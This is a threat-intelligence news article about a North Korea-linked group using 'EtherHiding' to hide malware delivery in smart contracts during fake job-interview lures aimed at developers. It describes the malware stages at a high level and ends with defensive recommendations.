North Korean Hackers Adopt “EtherHiding” to Conceal Malware in Smart Contracts
A North Korean–linked group has, for the first time, adopted EtherHiding — a technique that conceals malicious code inside smart contracts on public blockchains and swaps payloads on the fly. Google’s Threat Intelligence Team attributes the technique to UNC5342 (also tracked as CL-STA-0240 by Palo Alto Networks, DeceptiveDevelopment by ESET, and DEVPOPPER by Securonix).
The attack vectors follow a long-running campaign known as Contagious Interview: operators approach developers via LinkedIn, posing as recruiters, migrate conversations to Telegram or Discord, and under the pretense of a coding test coerce targets into executing malicious code. The objective: unauthorized access to developer workstations for data theft and theft of crypto assets.
Google reports observing EtherHiding since February 2025. Attackers embed code in a smart contract on chains such as BNB Smart Chain or Ethereum, using the blockchain as a decentralized “dead drop” — an infrastructure resistant to takedown and censorship. Transaction pseudonymity complicates attribution of contract deployments, and a controller address can refresh the malicious payload at will. With average gas fees around $1.37, operators can pivot tactics and swap modules rapidly. Mandiant warns that state-linked actors’ embrace of such mechanisms increases campaign survivability and accelerates adaptation to new targets.
In practice, the compromise unfolds in stages after an initial social-engineering lure in messaging apps. The intrusion affects Windows, macOS, and Linux hosts alike. A bootstrapper — disguised as an npm package — is executed first. Next, BeaverTail, a JavaScript stealer, harvests crypto-wallet data, browser-extension contents, and saved credentials. A second JS loader, JADESNOW, then queries Ethereum to fetch InvisibleFerret — a JavaScript port of a previously observed Python backdoor — which establishes remote control and enables prolonged exfiltration from wallets like MetaMask and Phantom as well as password managers such as 1Password.
Operators may also pull a portable Python interpreter and run a separate credential-theft module stored at a different blockchain address. Occasionally multiple chains are used concurrently to harden the delivery channel and confound remediation.
This technique raises the bar for defenders: it resists takedowns and law-enforcement action, complicates artifact analysis, and forces security teams to monitor not only domains and hosting but also the referential logic of smart contracts, on-chain addresses, and characteristic RPC calls. Developers targeted via LinkedIn are particularly vulnerable — they often possess wallets, access to repositories and build infrastructure, and installed toolchains that lend themselves to supply-chain exploitation.
The campaign marks a clear pivot toward misusing blockchain platforms as distributed command-and-control and delivery infrastructure for malware. Defensive teams should instrument transactional pattern detection, surveil smart-contract interactions, and bake blockchain-centric indicators — addresses, method signatures, and provider RPC behaviors — into their analytics; without such measures, spotting and disrupting these chains will become increasingly difficult.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
